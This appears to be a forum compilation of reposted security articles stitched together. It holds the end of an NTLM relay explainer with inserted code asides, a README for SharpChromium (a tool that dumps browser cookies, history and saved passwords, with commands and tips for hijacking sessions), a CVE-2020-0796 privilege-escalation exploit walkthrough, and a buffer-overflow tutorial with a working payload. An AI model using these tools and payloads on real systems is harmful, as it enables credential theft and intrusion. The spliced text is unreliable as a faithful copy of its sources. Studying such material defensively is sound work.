This negotiation lets each side know whether the client and/or the server supports signing (among other things), and it takes place during the NTLM exchange. So I lied to you a bit earlier: authentication and session are not completely independent. (By the way, I said that since they were independent, you could change protocol when relaying; there are limits, which we will see in the chapter on the MIC.) In fact, NTLM messages carry other information besides the challenge and the response. There are also negotiation flags, or Negotiate Flags. These flags indicate what the sending entity supports. There are several flags, but the one of interest here is NEGOTIATE_SIGN. When this flag is set to 1 by the client, it means that the client supports signing. Be careful: it does not mean that the client will necessarily sign its packets, just that it is capable of it. Similarly, when the server replies, if it supports signing, the flag will also be set to 1. This negotiation thus allows each of the two parties, client and server, to indicate to the other whether it is able to sign packets. For some protocols, even if both the client and the server support signing, this does not necessarily mean that the packets will be signed.

Implementation

Now that we've seen how both parties indicate their ability to sign packets, they have to agree on whether to do it. This time, the decision depends on the protocol: it is made differently for SMBv1, for SMBv2 or for LDAP, but the idea remains the same. Depending on the protocol, there are usually 2 or even 3 options that can be set to decide whether signing will be enforced:

Disabled: signing is not handled at all.
Enabled: the machine can handle signing if need be, but does not require it.
Mandatory: signing is not only supported, but packets must be signed for the session to continue.

We will look at two protocols as examples, SMB and LDAP.

SMB

Signature matrix

A matrix is provided in the Microsoft documentation to determine whether or not SMB packets are signed based on the client-side and server-side settings (the table itself is reproduced in the original post). Note that for SMBv2 and higher, signing is always handled; the Disabled setting no longer exists. There is a difference when both client and server have the Enabled setting. In SMBv1, the default setting for servers was Disabled, so all SMB traffic between clients and servers was unsigned by default. This avoided overloading the servers with signature computations for every SMB packet. As the Disabled state no longer exists for SMBv2, and servers are now Enabled by default, the behavior between two Enabled entities was changed in order to keep this load saving: signing is no longer applied in that case. The client and/or the server must explicitly require signing for SMB packets to be signed.
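As a practical aside (a sketch of ours, not from the original article), impacket exposes the server-side signing requirement negotiated at connection time, which is handy for checking potential relay targets:

# Quick check of a target's SMB signing requirement with impacket
from impacket.smbconnection import SMBConnection

conn = SMBConnection('WEB01', '192.168.56.211')  # lab server from the examples
print('Signing required:', conn.isSigningRequired())
conn.close()

If signing is not required on the target, a relayed session can proceed unsigned; relay tools rely on this same negotiated information.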
Settings

In order to change the default signing settings on a server, the EnableSecuritySignature and RequireSecuritySignature values must be changed in the registry hive HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters. The screenshot in the original post was taken on a domain controller. By default, domain controllers require SMB signing when a client authenticates to them. Indeed, the GPO applied to domain controllers contains this entry. On the other hand, we can see in that capture that, just above this setting, the same parameter applied to the "Microsoft network client" is not applied. So when the domain controller acts as an SMB server, SMB signing is required, but when a connection goes from the domain controller to another server, SMB signing is not required.

Setup

Now that we know where SMB signing is configured, we can see this parameter applied during a communication. It happens just before authentication. In fact, when a client connects to an SMB server, the steps are as follows:

Negotiation of the SMB version and the signing requirements
Authentication
SMB session with the negotiated parameters

Here is an example of an SMB signing negotiation: we see a response from a server indicating that it has the Enabled setting, but that it does not require signing. To summarize, here is how a negotiation / authentication / session takes place:

In the negotiation phase, both parties state their requirements: is signing required by one of them?
In the authentication phase, both parties state what they support: are they capable of signing?
In the session phase, if the capabilities and the requirements are compatible, the session proceeds by applying what has been negotiated.

For example, if the DESKTOP01 client wants to communicate with the DC01 domain controller, DESKTOP01 indicates that it does not require signing, but that it can handle it if needed. DC01 indicates that it not only supports signing, but requires it. During the NTLM negotiation, the client and server set the NEGOTIATE_SIGN flag to 1 since they both support signing. Once authentication is completed, the session continues, and the SMB exchanges are effectively signed.

LDAP

Signing matrix

For LDAP, there are also three levels:

Disabled: packet signing is not supported.
Negotiated Signing: the machine can handle signing, and if the machine it is communicating with also handles it, then packets will be signed.
Required: signing is not only supported, but packets must be signed for the session to continue.

As you can read, the intermediate level, Negotiated Signing, differs from the SMBv2 case: this time, if the client and the server are both able to sign packets, then they will. Whereas for SMBv2, packets were only signed if it was a requirement for at least one entity. So for LDAP we have a matrix similar to SMBv1, except for the default behaviors. The difference with SMB is that in an Active Directory domain, all hosts have the Negotiated Signing setting; the domain controller doesn't require signing.

Settings

For the domain controller, the ldapserverintegrity registry value is in the HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters hive and can be 0, 1 or 2 depending on the level. It is set to 1 on domain controllers by default. For the clients, the equivalent value is located under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ldap. It is also set to 1 for clients.
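A small sketch of ours for reading these two levels with Python's winreg (the exact value names, LDAPServerIntegrity and LDAPClientIntegrity, are as commonly documented; treat them as assumptions):

import winreg

PATHS = [
    (r"SYSTEM\CurrentControlSet\Services\NTDS\Parameters", "LDAPServerIntegrity"),  # DC side
    (r"SYSTEM\CurrentControlSet\Services\ldap", "LDAPClientIntegrity"),             # client side
]

for path, value_name in PATHS:
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
            value, _ = winreg.QueryValueEx(key, value_name)
            print(f"{value_name}: {value}")  # 0 = disabled, 1 = negotiated, 2 = required
    except OSError:
        print(f"{path}\\{value_name} not present on this host")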
Since all clients and domain controllers have Negotiated Signing, all LDAP packets are signed by default.

Setup

Unlike SMB, there is no flag in LDAP indicating whether packets will be signed or not. Instead, LDAP relies on the flags set during the NTLM negotiation; no more information is needed. If both client and server support LDAP signing, then the NEGOTIATE_SIGN flag will be set and the packets will be signed. If one party requires signing and the other does not support it, the session simply won't start: the party requiring signing will ignore the unsigned packets. So we now understand that, contrary to SMB, if we are between a client and a server and we want to relay an authentication to the server using LDAP, we need two things:

1. The server must not require packet signing, which is the case for all machines by default.
2. The client must not set the NEGOTIATE_SIGN flag to 1. If it does, the server will expect signed packets, and since we don't know the client's secret, we won't be able to sign our crafted LDAP packets.

Regarding requirement 2, some clients don't set this flag, but unfortunately, the Windows SMB client does! By default, it is therefore not possible to relay SMB authentication to LDAP. So why not just flip the NEGOTIATE_SIGN flag to 0? Well… NTLM messages are also signed. This is what we will see in the next paragraph.

Authentication signing (MIC)

We saw how a session can be protected against a man-in-the-middle attacker. Now, to understand the point of this chapter, let's look at a specific case.

Edge case

Let's imagine that an attacker manages to put himself in a man-in-the-middle position between a client and a domain controller, and that he receives an authentication request via SMB. Knowing that a domain controller requires SMB signing, it is not possible for the attacker to relay this authentication over SMB. On the other hand, it is possible to change protocol, as we saw above, and the attacker decides to relay to LDAPS, since authentication and session should be independent. Well, they are almost independent. Almost, because we saw that the authentication data carries the NEGOTIATE_SIGN flag, which indicates whether the client and server support signing, and in some cases this flag is taken into account, as we saw with LDAP. For LDAPS, this flag is also taken into account by the server: if a server receives an authentication request with the NEGOTIATE_SIGN flag set to 1, it will reject the authentication. This is because LDAPS is LDAP over TLS, and it is the TLS layer that handles packet signing (and encryption). Thus, an LDAPS client has no reason to indicate that it can sign its packets, and if it claims to be able to do so, the server laughs at it and slams the door.

Now, in our attack, the client we're relaying wanted to authenticate via SMB, so yes, it supports packet signing, and yes, it sets the NEGOTIATE_SIGN flag to 1. If we relay its authentication, without changing anything, to LDAPS, the LDAPS server will see this flag and terminate the authentication phase, no questions asked. We could simply modify the NTLM message and remove the flag, couldn't we? If we could, we would, and it would work. Except that there is also a signature at the NTLM level. That signature is called the MIC, or Message Integrity Code.

MIC - Message Integrity Code

The MIC is a signature that is sent only in the last message of an NTLM authentication, the AUTHENTICATE message.
It covers all 3 messages. The MIC is computed with the HMAC_MD5 function, using a key that depends on the client's secret, called the session key:

MIC = HMAC_MD5(Session key, NEGOTIATE_MESSAGE + CHALLENGE_MESSAGE + AUTHENTICATE_MESSAGE)

What is important is that the session key depends on the client's secret, so an attacker cannot recompute the MIC. The original post shows an example of a MIC. Therefore, if even one of the 3 messages has been modified, the MIC will no longer be valid, since the concatenation of the 3 messages will not be the same. So we can't flip the NEGOTIATE_SIGN flag, as suggested in our example.

What if we just remove the MIC? Because yes, the MIC is optional. Well, it won't work, because there is another flag, msAvFlags, that indicates whether a MIC is present. It is part of the NTLM response, and if it is set to 0x00000002, it tells the server that a MIC must be present. So if the server doesn't see the MIC, it knows something is going on, and it terminates the authentication. If the flag says there must be a MIC, then there must be a MIC.

All right, and if we set msAvFlags to 0 and remove the MIC, what happens? Since there's no MIC anymore, nothing can prove that the message has been modified, right? … Well, it can. It turns out that the NTLMv2 hash, the response to the challenge sent by the server, is a hash that takes into account not only the challenge (obviously), but also all the flags in the response. As you may have guessed, the flag indicating the MIC presence is part of this response. Changing or removing this flag would make the NTLMv2 hash invalid, since the data would have been modified. Here is what it looks like: the MIC protects the integrity of the 3 messages, msAvFlags protects the presence of the MIC, and the NTLMv2 hash protects the presence of the flag. The attacker, not knowing the user's secret, cannot recompute this hash. So, you will have understood: we can do nothing in this case, and that's thanks to the MIC.

Drop the MIC

A little review of a recent vulnerability found by Preempt, which you will now easily understand: CVE-2019-1040, nicely named Drop the MIC. This vulnerability showed that if the MIC was simply removed, even if the flag indicated its presence, the server accepted the authentication without flinching. This was obviously a bug, which has since been fixed. It has been integrated into the ntlmrelayx tool via the --remove-mic parameter. Let's take our earlier example, but this time with a domain controller that is still vulnerable. This is what it looks like in practice: our attack works. Amazing. For information, another vulnerability was discovered by the very same team, and they called it Drop The MIC 2.

Session key

Earlier we talked about session and authentication signing, saying that to sign something you have to know the user's secret. We said in the chapter about the MIC that in reality it's not exactly the user's secret that is used, but a key called the session key, which depends on the user's secret. To give you an idea, here's how the session key is computed for NTLMv1 and NTLMv2:

# For NTLMv1
Key = MD4(NT Hash)

# For NTLMv2
Key = HMAC_MD5(NTLMv2 Hash, HMAC_MD5(NTLMv2 Hash, NTLMv2 Response + Challenge))

Going into the details would not be very useful, but there is clearly a complexity difference between the two versions. I repeat: do not use NTLMv1 in a production network.
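A compact Python sketch of ours transcribing the two constructions above (session key and MIC), for illustration:

import hmac, hashlib

def session_key_v2(ntlmv2_hash, ntlmv2_response, challenge):
    # Key = HMAC_MD5(NTLMv2 hash, HMAC_MD5(NTLMv2 hash, NTLMv2 response + challenge))
    inner = hmac.new(ntlmv2_hash, ntlmv2_response + challenge, hashlib.md5).digest()
    return hmac.new(ntlmv2_hash, inner, hashlib.md5).digest()

def mic(session_key, negotiate_msg, challenge_msg, authenticate_msg):
    # MIC = HMAC_MD5(session key, NEGOTIATE + CHALLENGE + AUTHENTICATE)
    # (the AUTHENTICATE message is taken with its MIC field zeroed)
    return hmac.new(session_key, negotiate_msg + challenge_msg + authenticate_msg,
                    hashlib.md5).digest()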
With this information, we understand that the client can compute this key on its own, since it has all the information needed to do so. The server, on the other hand, can't always do it alone. For local authentication, there is no problem, since the server knows the user's NT hash. But for authentication with a domain account, the server has to ask the domain controller to compute the session key for it and send it back. We saw in the pass-the-hash article that the server sends a request to the domain controller in a NETLOGON_NETWORK_INFO structure, and the domain controller responds with a NETLOGON_VALIDATION_SAM_INFO4 structure. It is in this response from the domain controller that the session key is sent, if authentication is successful.

The question then arises: what prevents an attacker from making the same request to the domain controller as the target server? Well, before CVE-2015-0005, nothing!

"What we found while implementing the NETLOGON protocol [12] is the domain controller not verifying whether the authentication information being sent, was actually meant to the domain-joined machine that is requesting this operation (e.g. NetrLogonSamLogonWithFlags()). What this means is that any domain-joined machine can verify any pass-through authentication against the domain controller, and to get the base key for cryptographic operations for any session within the domain."

So obviously, Microsoft has fixed this bug. To verify that only the server the user is authenticating to has the right to ask for the session key, the domain controller verifies that the target machine in the AUTHENTICATE response is the same as the host making the NetLogon request. In the AUTHENTICATE response, we detailed the presence of msAvFlags indicating whether the MIC is present, but there is also other information, such as the NetBIOS name of the target machine. This is the name that is compared with the host making the NetLogon request. Thus, if the attacker tries to make a NetLogon request for the session key, since the attacker's name does not match the target host name in the NTLM response, the domain controller will reject the request. Finally, in the same way as msAvFlags, the machine name cannot be changed on the fly in the NTLM response, because it is taken into account in the computation of the NTLMv2 response. A vulnerability similar to Drop the MIC 2 was recently discovered by the Preempt security team; here is the link to their post if you're curious.

Channel Binding

We're going to talk about one last notion. Several times we have repeated that the authentication layer, i.e. the NTLM messages, is almost independent of the application layer, the protocol in use (SMB, LDAP, …). I say "almost" because we have seen that some protocols use certain NTLM message flags to decide whether the session must be signed or not. In any case, as things stand, it is quite possible for an attacker to take an NTLM message received over protocol A and send it over protocol B. This is called cross-protocol relay, as we already mentioned. Well, a newer protection exists to counter this attack: channel binding, also called EPA (Enhanced Protection for Authentication). The principle of this protection is to bind the authentication layer to the protocol in use, and even to the TLS layer when there is one (LDAPS or HTTPS, for example). The general idea is that the last NTLM message, AUTHENTICATE, embeds a piece of information that cannot be modified by an attacker.
This information indicates the desired service, and potentially another piece of information containing the hash of the target server's certificate. We'll look at these two principles in a little more detail, but don't worry, they are relatively simple to understand.

Service binding

This first protection is quite simple to understand. If a client wishes to authenticate to a server in order to use a specific service, information identifying that service is added to the NTLM response. This way, when the legitimate server receives this authentication, it can see which service was requested by the client, and if it differs from the service actually being requested, it refuses to provide it. Since the service name is in the NTLM response, it is protected by the NtProofStr value, an HMAC_MD5 of this information, the challenge and other information such as msAvFlags, computed with the client's secret.

In the example shown in the diagram, we see a client trying to authenticate via HTTP to a server. Except that the server is an attacker, and the attacker replays this authentication to a legitimate server in order to access a network share (SMB). But the client indicated in its NTLM response the service it wanted to use, and since the attacker cannot modify it, he has to relay it as is. The server then receives the last message, compares the service requested by the attacker (SMB) with the service specified in the NTLM message (HTTP), and refuses the connection, finding that the two do not match. Concretely, what is called the service is in fact the SPN, or Service Principal Name. I dedicated a whole article to the explanation of this notion. A screenshot in the original post shows a client sending the SPN in its NTLM response; we can see that it indicates the CIFS service (equivalent to SMB, just a different terminology). Relaying this to an LDAP server that takes this information into account results in a nice "Access denied" from the server. But as you can see, there is not only the service name (CIFS) but also the target name or IP address. This means that if an attacker relays this message to another server, that server will also check the target part and refuse the connection, because the IP address found in the SPN does not match its own. So if this protection were supported by all clients and all servers, and required by every server, it would mitigate all relay attempts.

TLS Binding

This time, the purpose of the protection is to link the authentication layer, i.e. the NTLM messages, to the TLS layer that may be in use. If the client wants to use a protocol encapsulated in TLS (HTTPS or LDAPS, for example), it establishes a TLS session with the server and computes a hash of the server's certificate. This hash is called the Channel Binding Token, or CBT. Once computed, the client puts this hash in its NTLM response. The legitimate server then receives the NTLM message at the end of the authentication, reads the provided hash, and compares it with the real hash of its certificate. If it is different, it means the server was not the original recipient of the NTLM exchange. Again, since this hash is in the NTLM response, it is protected by NtProofStr, like the SPN for service binding.
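For the curious, here is a rough sketch of ours of how the CBT value that lands in the NTLMv2 response can be derived (simplified from MS-NLMP and RFC 5929's tls-server-end-point binding; treat the structure details as assumptions):

import hashlib

def channel_binding_token(server_cert_der: bytes) -> bytes:
    # tls-server-end-point uses a hash of the certificate (the algorithm
    # depends on the certificate's signature algorithm; SHA-256 is typical)
    cert_hash = hashlib.sha256(server_cert_der).digest()
    app_data = b'tls-server-end-point:' + cert_hash
    # MD5 over the gss_channel_bindings_struct, with only the application
    # data populated (the four address fields are left at zero)
    gss_struct = b'\x00' * 16 + len(app_data).to_bytes(4, 'little') + app_data
    return hashlib.md5(gss_struct).digest()  # ends up in the MsvChannelBindings AV pair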
Thanks to this protection, the following two attacks are no longer possible:

If an attacker wishes to relay information from a client using a protocol without a TLS layer to a protocol with a TLS layer (HTTP to LDAPS, for example), the attacker will not be able to add the target server's certificate hash to the NTLM response, since it cannot update the NtProofStr.

If an attacker wishes to relay a protocol with TLS to another protocol with TLS (HTTPS to LDAPS), when establishing the TLS session between the client and the attacker, the attacker will not be able to provide the server's certificate, since it does not match the attacker's identity. It will therefore have to provide a "homemade" certificate identifying the attacker. The client will then hash this certificate, and when the attacker relays the NTLM response to the legitimate server, the hash in the response will not be the same as the hash of the real certificate, so the server will reject the authentication.

Here is a diagram to illustrate the second case. It seems complicated, but it's not. It shows the establishment of two TLS sessions: one between the client and the attacker (in red) and one between the attacker and the server (in blue). The client will retrieve the attacker's certificate and calculate a hash, cert hash, in red. At the end of the NTLM exchanges, this hash will be added to the NTLM response, and will be protected since it is part of the encrypted data of the NTLM response. When the server receives this hash, it will hash its own certificate, and seeing that it is not the same result, it will refuse the connection.

Again, Preempt recently found a vulnerability here, which has since been fixed.

What can be relayed?

With all this information, you should be able to know which protocols can be relayed to which protocols. We have seen that it is impossible to relay from SMB to LDAP or LDAPS, for example. On the other hand, any client that does not set the NEGOTIATE_SIGN flag can be relayed to LDAP if signing is not required, or to LDAPS if channel binding is not required. As there are many cases, here is a table summarizing some of them. I think we can't relay to LDAPS or HTTPS since the attacker doesn't have a valid certificate, but let's say the client is permissive and allows untrusted certificates. Other protocols could be added, such as SQL or SMTP, but I must admit I didn't read the documentation for all the protocols that exist. Shame on me. For the gray boxes, I don't know how an HTTPS server handles an authentication with the NEGOTIATE_SIGN flag set to 1.

Stop. Using. NTLMv1.

Here is a little "fun fact" that Marina Simakov suggested I add. As we discussed, the NTLMv2 response takes into account the server's challenge, but also the msAvFlags field which indicates the presence of a MIC, the field indicating the NetBIOS name of the target host during authentication, the SPN in the case of service binding, and the certificate hash in the case of TLS binding. Well, the NTLMv1 protocol doesn't do that. It only takes into account the server's challenge. There is no additional information such as the target name, the msAvFlags, the SPN or the CBT. So, if NTLMv1 authentication is allowed by a server, an attacker can simply remove the MIC and thus relay authentications to LDAP or LDAPS, for example. But more importantly, he can make NetLogon requests to retrieve the session key. Indeed, the domain controller has no way to check whether he has the right to do so.
And since it won’t block a production network that isn’t completely up to date, it will kindly give it to the attacker, for “retro-compatibility reasons”. Once he has the session key, he can sign any packet that he wants. It means that even if the target requests signing, he will be able to do so. This is by design and it can not be fixed. So I repeat, do not allow NTLMv1 in a production network. Conclusion Well, that’s a lot of information. We have seen here the details of NTLM relay, being aware that authentication and session that follows are two distinct notions allowing to do cross-protocol relay in many cases. Although the protocol somehow includes authentication data, it is opaque to the protocol and managed by SSPI. We have also shown how packet signing can protect the server from man-in-the-middle attacks. To do this, the target must wait for signed packet coming from the client, otherwise the attacker will be able to pretend to be someone else without having to sign the messages he sends. We saw that MIC was very important to protect NTLM exchanges, especially the flag indicating whether packets will be signed for certain protocols, or information about channel binding. We ended by showing how channel binding can link the authentication layer and the session layer, either via the service name or via a link with the server certificate. I hope this long article has given you a better understanding of what happens during an NTLM relay attack and the protections that exist. Since this article is quite substantial, it is quite likely that some mistakes have slipped in. Feel free to contact me on twitter or on my Discord Server to discuss this. Active Directory Windows Author : Pixis Blog author, follow me on twitter or discord Sursa: https://en.hackndo.com/ntlm-relay/
-
SharpChromium

Introduction

SharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta. Currently, it can extract:

Cookies (in JSON format)
History (with associated cookies for each history item)
Saved Logins

Note: All cookies returned are in JSON format. If you have the extension Cookie Editor installed, you can simply copy and paste into the "Import" section of this browser addon to ride the extracted session.

Advantages

This rewrite has several advantages over previous implementations, which include:

No Type compilation or reflection required
Cookies are displayed in JSON format, for easy importing into Cookie Editor.
No downloading SQLite assemblies from remote resources.
Supports major Chromium browsers (but extendable to others)

Usage

Usage: .\SharpChromium.exe arg0 [arg1 arg2 ...]
Arguments:
  all     - Retrieve all Chromium Cookies, History and Logins.
  full    - The same as 'all'
  logins  - Retrieve all saved credentials that have non-empty passwords.
  history - Retrieve user's history with a count of each time the URL was visited, along with cookies matching those items.
  cookies [domain1.com domain2.com] - Retrieve the user's cookies in JSON format. If domains are passed, then return only cookies matching those domains. Otherwise, all cookies are saved into a temp file of the format "%TEMP%\$browser-cookies.json"

Examples

Retrieve cookies associated with Google Docs and Github:
.\SharpChromium.exe cookies docs.google.com github.com

Retrieve history items and their associated cookies:
.\SharpChromium.exe history

Retrieve saved logins (Note: Only displays those with non-empty passwords):
.\SharpChromium.exe logins

Notes on the SQLite Parser

The SQLite database parser is slightly bugged. This is due to the fact that the parser correctly detects data blobs as type System.Byte[], but it does not correctly detect columns of type System.Byte[]. As a result, the byte arrays get cast to the string literal "System.Byte[]", which is wrong. I haven't gotten to the root of this cause, but as a quick and dirty workaround I have encoded all blob values as Base64 strings. Thus, if you wish to retrieve a value from a column whose regular data values would be a byte array, you'll need to Base64 decode them first.

Special Thanks

A large thanks to @plainprogrammer for their C#-SQLite project, which allowed for native parsing of the SQLite files without having to reflectively load a DLL. Without their work this project would be nowhere near as clean as it is. That project can be found here: https://github.com/plainprogrammer/csharp-sqlite

Thanks to @gentilkiwi, whose work on Mimikatz guided the rewrite for the decryption scheme in v80+.

Thanks to @harmj0y, who carved out the requisite PInvoke BCrypt code so I could remove additional dependencies from this project, making it lightweight again.

Sursa: https://github.com/djhohnstein/SharpChromium
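Since blob columns come out Base64-encoded (see the parser note above), anything consuming SharpChromium's output has to decode them before use. A minimal sketch; the encrypted_value column name is only an example of a blob-typed column:

import base64

def decode_blob(b64_value):
    # SharpChromium emits BLOB columns (e.g. encrypted_value) as Base64 strings;
    # decode to recover the raw bytes
    return base64.b64decode(b64_value)

print(decode_blob("dGVzdA=="))  # -> b'test'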
-
CVE-2020-0796 Windows SMBv3 LPE Exploit POC Analysis

April 2, 2020 | Vulnerability Analysis · 404 Column · 404 English Paper

Contents: 0x00 Background | 0x01 Exploit principle | 0x02 Get Token | 0x03 Compressed Data | 0x04 Debugging | 0x05 Elevation

Author: SungLin@Knownsec 404 Team
Time: April 2, 2020
Chinese version: https://paper.seebug.org/1164/

0x00 Background

On March 12, 2020, Microsoft confirmed that a critical vulnerability affecting the SMBv3 protocol exists in the latest version of Windows 10, and assigned it CVE-2020-0796. It could allow an attacker to remotely execute code on the SMB server or client. On March 13, a PoC that causes a BSOD was announced, and on March 30, a PoC that achieves local privilege escalation was released. Here we analyze the local privilege escalation PoC.

0x01 Exploit principle

The vulnerability exists in the srv2.sys driver. Because SMB does not properly handle compressed packets, the function Srv2DecompressData is called when a compressed packet is processed, and the size fields of the compression header, OriginalCompressedSegmentSize and Offset, are not checked for validity. This results in too small an allocation, and the undersized buffer is later handed to SmbCompressionDecompress for data processing. Using this smaller piece of memory can cause a copy overflow or an out-of-bounds access.

A local program can obtain the address of its own token; the address token + 0x40 is then sent to the SMB server inside compressed data. That address ends up in the kernel memory that is written to when the data is decompressed, and through a carefully constructed memory layout the token is modified in the kernel to elevate privileges.

0x02 Get Token

Let's analyze the code first. After the POC program establishes a connection with SMB, it first obtains the token of this program by calling the function OpenProcessToken. The obtained token address will be sent to the SMB server through compressed data, to be modified in the kernel driver. The token address is the kernel address of the process's token object. TOKEN is a kernel memory structure used to describe the security context of a process, including the token privileges, login ID, session ID, token type, etc. Below is the token address obtained in my test.

0x03 Compressed Data

Next, the PoC calls RtlCompressBuffer to compress a piece of data, namely 'A' * 0x1108 + (ktoken + 0x40); by sending this compressed data to the SMB server, the SMB server will end up using this token address in the kernel. The length of the compressed data is 0x13. Right after the compressed data (that is, following the compression transform header and the compressed bytes), two identical values of 0x1FF2FF00BC are appended, and these two values are the key to the elevation.

0x04 Debugging

Let's debug it first, because this is an integer overflow vulnerability. In the function srv2!Srv2DecompressData, the addition 0xffffffff + 0x10 overflows to 0xf, so a smaller buffer is allocated in srvnet!SrvNetAllocateBuffer. Execution then enters srvnet!SmbCompressionDecompress and nt!RtlDecompressBufferEx2 to continue the decompression, then the function nt!PoSetHiberRange, and the decompression operation starts. Adding OriginalCompressedSegmentSize = 0xffffffff to the address of the UnCompressBuffer that was allocated with the overflowed size yields an address far beyond the buffer's limit, which would cause a copy overflow.
But the size of the data we actually need to copy at the end is only 0x1108, so there is still no overflow, because the real allocated size is 0x1278: the pool allocation goes through srvnet!SrvNetAllocateBuffer, which finally reaches srvnet!SrvNetAllocateBufferFromPool and calls nt!ExAllocatePoolWithTag to allocate the pool memory.

Although the copy does not overflow, it does overwrite other variables in this memory, including the return value of srv2!Srv2DecompressData. Within the allocation the layout is fixed: the UnCompressBuffer address field is at offset 0x60, and the return value is at offset 0x1150 relative to it, which means the field storing the address of the UnCompressBuffer sits at offset 0x10f0 relative to the return value; the field storing the offset data is at 0x1168, which is an offset of 0x1108 relative to the stored decompressed-data address.

Why are these fixed values? Because OriginalCompressedSegmentSize = 0xffffffff and Offset = 0x10 are passed in this time, the integer overflow yields 0xf, and in srvnet!SrvNetAllocateBuffer the passed-in size of 0xf is checked: since it is less than 0x1100, a fixed value of 0x1100 is used instead as the allocation size for the subsequent structure space; only when the requested value is greater than 0x1100 is the passed-in size used.

Then back to the decompressed data. The compressed data is 0x13 bytes and decompresses normally: 0x1100 bytes of 'A' are produced, and the 8-byte address of token + 0x40 is placed right after the 'A's. After the decompressed data is copied to the buffer that was allocated at the start, the decompression function exits normally, and then memcpy is called for the next data copy. The key point is that rcx now becomes the address of token + 0x40 of the local program!!!

After the decompression, the layout of the memory data is 0x1100 bytes of 'A' + the token address = 0x1108 bytes. The function srvnet!SrvNetAllocateBuffer returned the memory address we need, and the address of v8 is just the initial memory offset 0x10f0, so v8 + 0x18 = 0x1108; the size of the copy is controllable, and the offset passed in is 0x10. Finally, memcpy is called to copy the two values 0x1FF2FF00BC that follow the compressed data to the destination address 0xffff9b893fdc46f0 (token + 0x40); the 16 bytes there are overwritten, and the value of the token is successfully modified.

0x05 Elevation

The value written is two identical copies of 0x1FF2FF00BC. Why use two identical values to overwrite token + 0x40? This is one of the methods of operating on a token in the Windows kernel to elevate privileges. Generally there are two methods: the first is to directly overwrite the token pointer, and the second is to modify the token's contents. Here, the token is modified. In windbg, you can run the kd> dt _TOKEN command to view its structure.
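To see why 0x1FF2FF00BC is a useful overwrite value: the Present and Enabled fields of _SEP_TOKEN_PRIVILEGES are 64-bit bitmaps in which bit n corresponds to the privilege with LUID n. A small decoding sketch in Python; the LUID-to-name map is partial, covering only a few well-known privileges:

# Decode the _SEP_TOKEN_PRIVILEGES bitmap: bit n == privilege LUID n
WELL_KNOWN = {
    7:  "SeTcbPrivilege",
    17: "SeBackupPrivilege",
    18: "SeRestorePrivilege",
    19: "SeShutdownPrivilege",
    20: "SeDebugPrivilege",
    23: "SeChangeNotifyPrivilege",
    29: "SeImpersonatePrivilege",
}

mask = 0x1FF2FF00BC
for bit in range(64):
    if mask & (1 << bit):
        print(bit, WELL_KNOWN.get(bit, "(other privilege)"))

Running this shows, among others, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege and SeImpersonatePrivilege set, i.e. the privilege set of a SYSTEM token.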
So the PoC modifies the value of _SEP_TOKEN_PRIVILEGES: both the Present and the Enabled bitmaps are overwritten with 0x1FF2FF00BC, the full privilege set of a SYSTEM process token, which sets the permissions to:

This successfully elevates the privileges in the kernel; arbitrary code can then be executed by injecting regular shellcode into the Windows process "winlogon.exe":

The PoC then launches the calculator, as shown below:

Reference links:

https://github.com/eerykitty/CVE-2020-0796-PoC
https://github.com/danigargu/CVE-2020-0796
https://ired.team/miscellaneous-reversing-forensics/windows-kernel/how-kernel-exploits-abuse-tokens-for-privilege-escalation

Published by Seebug Paper; please credit the source when reposting. Original: https://paper.seebug.org/1165/

Sursa: https://paper.seebug.org/1165/
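For reference, packing the malformed SMBv3 compression transform header described in this analysis can be sketched as follows. This is only a packing illustration: the '\xfcSMB' magic and the LZNT1 algorithm ID 0x0001 come from MS-SMB2, and the size/offset values come from the analysis above.

import struct

# COMPRESSION_TRANSFORM_HEADER: ProtocolId (4 bytes, '\xfcSMB'),
# OriginalCompressedSegmentSize (ULONG), CompressionAlgorithm (USHORT),
# Flags (USHORT), Offset (ULONG) -- all little-endian
def transform_header(orig_size=0xFFFFFFFF, offset=0x10, algorithm=0x0001):
    return b"\xfcSMB" + struct.pack("<IHHI",
                                    orig_size,  # 0xFFFFFFFF: 0xFFFFFFFF + 0x10 overflows to 0xf
                                    algorithm,  # 0x0001 = LZNT1
                                    0,          # Flags
                                    offset)     # 0x10: a legitimate-looking offset

# The 0x13 bytes of compressed data and the two 0x1FF2FF00BC qwords would follow this header.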
-
Binary Exploitation 01 — Introduction

Silaghi Fineas | Mar 31 · 4 min read

GREETINGS FELLOW HACKERS! It's been a while since our last post, but this is because we've prepared something for you: a multi-episode Binary Exploitation series. Without further ado, let's get started.

What is Memory Corruption?

It might sound familiar, but what does it really mean? Memory corruption is a vast area which we will explore throughout this series, but for now, it is important to remember that it refers to the action of "modifying a binary's memory in a way that was not intended". Basically any kind of system-level exploit involves some kind of memory corruption.

Let's have a look at an example. We will consider the following program: a short program that asks for user input. If the input matches the Admin's secret password, we will be granted Admin privileges; otherwise we will be a normal User. How can we become an Admin without knowing the password? One solution is to brute-force the password. This approach might work for a short password, but for a 32-byte password, it's useless. Then what can we do? Let's play with random input values: "Welcome Admin"? What just happened?

Let's take a closer look at the memory level, using a debugger, and understand why we became Admin. We can see that the INPUT we enter will be loaded on the stack ("a stack is an area of memory for storing data temporarily") at RBP-0x30, and the AUTH variable is located on the stack at RBP-0x4. Another aspect we can observe is that the "gets" function has no limit on the number of characters it reads. Thus, we can enter more than 32 characters. This leads to a so-called buffer overflow. As we can see, our input ('A'*32 + 'a'*16) will overflow the user_input buffer and overwrite the auth variable, thus giving us Admin privileges.

Think this is cool? Just wait, there's even more. We have seen that by performing buffer overflows we can overwrite variables on the stack. But is that all we can really do? Let's have a quick look into how functions work. Whenever a function is called, we can see that a value is pushed to the stack. That value is what we call a "return address". After the function finishes executing, it can return to the function that called it using the "return address". So, if the return address is placed on the stack and we can perform a buffer overflow, can we overwrite it? Let's try.

Running the program with a big input, we can see that the program returned a "Segmentation fault", because when the main function finished executing it tried to use the "return address", but the return address had been overwritten with A's by our input. So what does this mean? It means that we can take over the execution flow by overwriting the "return address" with the address of another function. Let's try to redirect the execution of the program to the takeover_the_world() function. The function is located at address 0x00000000004005c7 (one way to find this is to use the command: objdump -d program_name). Putting things together, we get the following input (payload):

'A'*32 + 'a'*16 + '\xc7\x05\x40\x00\x00\x00\x00\x00'

And we got a shell. Hurray!

